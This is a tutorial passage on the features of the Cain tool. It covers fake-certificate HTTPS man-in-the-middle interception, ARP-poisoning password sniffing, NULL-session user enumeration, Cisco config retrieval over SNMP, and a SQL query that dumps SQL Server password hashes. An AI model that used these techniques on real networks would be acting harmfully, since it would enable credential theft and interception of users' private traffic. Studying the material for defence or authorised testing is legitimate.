This part of the tutorial will Continue with below mentioned topics
Certificates Collector
Cisco Config Downloader/Uploader
Mac Scanner
Network Enumerator
Promiscuous-mode scanner
Sniffer
SQL Server 2000 Password Extractor
Traceroute
Certificates Collector
Cain’s Certificates Collector grabs server certificates from HTTPS web sites and prepares them for APR-HTTPS. The feature is automatically used by the HTTPS sniffer filter but you can also use it manually to create a list of pre-calculated fake certificate files. Why fake ? because the program will replace asymmetric encryption keys in these files with new ones generated locally. In this way theAPR-HTTPS will be able to encrypt/decrypt HTTPS traffic in a Man-in-the-Middle condition between victim APR’s hosts.
A fake certificate is self-signed by Cain so the client’s browser is supposed to pop up a dialog to notify that it comes from an untrusted certification authority; however because all other parameters within the certificate remain the same as the real ones a lot of users simply does not care about this warning.
Fake certificates are stored in the “Certs” subdirectory of the program’s installation path and the list of those currently available to APR-HTTPS is maintained in the file CERT.LST in the program’s directory. You can manually modify this list file to instruct Cain’s APR-HTTPS to inject the certificate of your choice into connections from APR’s victims computers to a given HTTPS server address.
Usage
The feature is used automatically by the HTTPS sniffer filter. You can use the + button on the toolbar to manually grab and prepare a list of fake certificates; non standard ports can be specified using the syntax “hostname:port” or “ip address:port”.
Cisco Config Downloader/Uploader
This feature allows you to download or upload the configuration file of Cisco devices via SNMP/TFTP. It supports routers and switches that uses the OLD-CISCO-SYSTEM-MIB or the new CISCO-CONFIG-COPY-MIB; for more information about those MIBs please refer to Cisco web site.
How it works
1) Cain requests the configuration file transfer to the Cisco device using the SNMP protocol. Request packets are constructed using some proprietary Cisco OIDs that the vendor provides for this functionality; they also contains other parameters like the protocol type, the server IP address and filenames to instruct the device on where to send or to take its configuration file.
2) At this point the device starts the file transfer using the protocol specified in the request (set to TFTP for simplicity).
3) Cain opens a TFTP socket in listening mode and handles the file transfer. A TFTP server is NOT required, when uploading the program sends the configuration file to the device, when downloading it receives it.
Usage
To download a configuration from a device press the “Insert” button on the keyboard or click the icon with the blue + on the toolbar, provide the IP address of the SNMP enabled device and the right Read/Write Community string. To upload a configuration use the relative function within the list pop up menu.
Limitations
This feature will not work if network restrictions, like ACLs or firewall rules, for interested protocols (SNMP/TFTP) are set. The TFTP file transfer is initiated by the device itself so dynamic NAT between you and the device is a problem as well.
Requirements
- CCDU works on Cisco Routers and Switches that supports the OLD-CISCO-SYSTEM-MIB or the new CISCO-CONFIG-COPY-MIB. PIX Firewalls does not support those MIBs.
- You also need the right Read/Write SNMP community string (e.g.: “private”), the Read-Only one is not enough.
MAC Scanner
The MAC address scanner is a very fast IP to MAC address resolver based on ARP Request/Reply packets. It takes as input a range of IP addresses on the current subnet and resolves the MAC addresses associated to those IP’s. The scanner includes an OUI database, providing MAC vendor’s information, this feature is useful to quickly identify switches, routers, load balancers and firewalls present in the LAN.
Because of the use of ARP packets that cannot cross routers or VLANs, this feature can resolve MAC addresses in the local broadcast domain only. The OUI database is a normalized version of the IEEE OUI list available at this link: http://standards.ieee.org/regauth/oui/index.shtml.
Once active hosts are found, you can also resolve their host names with the “Resolve Host Name” function within the list pop up menu.
Tip
The scanner cannot resolve MAC addresses if the network card is not correctly configured. You also have to check the APR’s spoofing options in the configuration dialog before initiating a scan.
Prerequisites
The sniffer must be activated.
Usage
The scanner’s configuration dialog is activated pressing the “Insert” button on the keyboard or click the icon with the blue + on the toolbar; then you have to select the range of IP addresses to resolve.
Network Enumerator
The Network Enumerator uses the native Windows network management functions (Net*) to discover what is present on the network. It allows a quick identification of Domain Controllers, SQL Servers, Printer Servers, Remote Access Dial-In Servers, Novell Servers, Apple File Servers, Terminal Servers and so on. It can also display when possible the version of their operating system.
The left tree is used to browse the network and to connect to remote machines; once connected to a server you can also enumerate user names, groups, services and shares present on it. By default the program connects to remote IPC$ shares using the current local logged on user and if it fails using NULL sessions (Anonymous sessions); however it is also possible to specify the credentials to be used for the connection. The Quick List can be used to insert IP addresses of hosts that aren’t seen browsing the network.
When enumerating users, Cain also extracts their Security Identifier (SID) and has the ability to identify the name of the Administrator account even if it was renamed. This is done by looking at the account RID which is the last part of a SID. The RID of the Administrator account is always equal to 500.
Windows NT and later has a security feature that can restrict the ability for anonymous logon users (also known as NULL session connections) to list account names and enumerate share names. This is done setting to 1 the parameter “RestrictAnonymous” under the registry key:
HKEY_LOCAL_MACHINESYSTEMCurrentControlSetControlLSA
If the program cannot enumerate users, because of this restriction, it will start automatically theSID Scanner and will proceed with an extraction of them using the same methodology used by the well known tool sid2user by Evgenii B. Rudnyi.
Tip
To perform an Anonymous connection (NULL Session) to the target host, leave the user name and password fields empty in the credentials dialog.
Usage
Enumerations are launched browsing the tree on the left into the Network tab. To specify credentials for a network connection you can right click on the target machine and use the “Connect As” function within the pop up menu.
Promiscuous-mode Scanner
The Promiscuous-mode scanner allows you to identify sniffers and network Intrusion Detection systems present on the LAN.This feature is included in the MAC Scanner and relies on responses received from various tests based on ARP packets.
It is possible to select the test to perform from the MAC Scanner dialog; positive results are reported into the “Hosts” list with an * in the relative column.
Be warned that not all operating systems respond in the same way; an example of the results from a Windows machine follows:
Network card not in promiscuous-mode (not sniffing)
Network card into promiscuous-mode (sniffing)
As you can see Windows machines, that are not sniffing the network, normally respond to ARP Test (Broadcast 16-bit) and ARP Test (Multicast group1) only. On the contrary when a sniffer is activated, and the network card is put into promiscuous-mode, they start to respond at ARP Test (Broadcast 31-bit) as well.
Prerequisites
The sniffer must be activated.
Limitations
Because of the use of ARP packets, that cannot cross routers or VLANs, this feature works only inside your broadcast domain.
Usage
Sniffer
Cain’s sniffer is principally focused on the capture of passwords and authentication information travelling on the network. It should not be compared to professional tools like Observer, SnifferPro or Ethereal but unlike any other commercial protocol analyzer it has been developed to work on switched networks by mean of APR (Arp Poison Routing), another feature included in the program.
Protocol Filters
There is a BPF (Berkeley Packet Filter) hard-coded into the protocol driver that performs some initial traffic screening. The filter instructs the protocol driver to process only ARP and IP traffic; other protocols, like NetBEUI for example, are not processed.
Password Filters
The sniffer includes several password filters that can be enabled/disabled from the mainconfiguration dialog; they are used to capture credentials from the following protocols:
Cain’s sniffer filters are internally designed to survive into an unreliable world such as a network under ARP Poison attack; Cain uses different protocol state machines to extract from network packets all the information needed to recover the plain text form of a transmitted password. Some authentication protocols use a challenge-response mechanism, for this reason the sniffer needs parameters from each Client->Server and Server->Client traffic. On switched networks this can be achieved with a mirror port on the switch or if APR reaches the FULL-Routing state.
When APR (Arp Poison Routing) is enabled, the sniffer must process packets that normally aren’t seen and also re-route them to the correct destination; this can cause performance bottlenecks on heavy traffic networks so be careful. APR’s main advantage is that it enables sniffing on switched networks and also permits the analysis of encrypted protocols such as HTTPS and SSH-1.
Passwords and hashes are stored in .LST files in the program’s directory. These files are comma separated files so you can view or import them with your preferred word processor (e.g.: POP3.LST contains passwords and hashes sniffed from the POP3 protocol).
For HTTPS, SSH-1 and Telnet protocols entire sessions are decrypted and dumped into text files using this naming convention:
(e.g.: Telnet-20041116135246796-1141.txt)
Off-line capture file processing
The sniffer can also process file captures (from Ethereal, Tcpdump and Winpcap) in off-line mode. The captures can be imported using the “open file” button of the sniffer’s toolbar; when processing network traffic off-line all APR’s functions are automatically disabled.
Routing Protocols Analysis
Routing protocols like VRRP, HSRP, RIP, OSPF, EIGRP are also analyzed by the program. This enables a quick identification of the subnet routing and perimeter.
For EIGRP and RIP protocols, the “Routes Extractor” feature will also dump the actual routing table shared between routers. The feature is only supported if these protocols don’t require authentication.
Usage
The sniffer is activated/deactivated using the relative toolbar button and its parameters can be configured from the main configuration dialog.
Requirements
- Supported Ethernet network adapter
SQL Server 2000 Password Extractor
Microsoft SQL Server 2000 stores the credentials of its accounts in the “master” database. User’s passwords are encrypted under the form of salted SHA-1 hashes into the table “sysxlogins”. This feature connects to the server using ODBC and dumps all SQL user’s hashes into the MSSQL Hashes Cracker list.
How it works
It connects to the server via ODBC and performs the following SQL command:
select name, password from master..sysxlogins
Usage
To dump the hashes go to the MSSQL Hashes Cracker and press the “Insert” button on the keyboard or click the icon with the blue + on the toolbar. Choose the Data Source Name (DSN) for the target server and provide system administrator (SA) credentials.
Requirements
This feature requires SQL Administrator’s privileges on the target database server
Traceroute
Cain’s traceroute is an improved version of the Windows tool “tracert.exe”.
The widespread usage of perimeter defences on the modern Internet makes sometimes impossible to reach the desired destination using the above utility; firewalls can drop ICMP packets without sending back ICMP responses, for this reason the entire path to the target host could not be completely traced. UDP or TCP protocol can be used to bypass common firewall restrictions so Cain’s traceroute supports all of them.
Consider for example the following ICMP trace to www.somesite.com:
The ICMP traceroute stops at hop 18; probably there is something over there that drops ICMP packets. The same trace but this time using TCP packets will cross that firewall entering in their Network.
As you can see the TCP traceroute reached the destination host (www.somesite.com) discovering some routers inside their organisation.
Usage
Choose the protocol type, select the target and press start.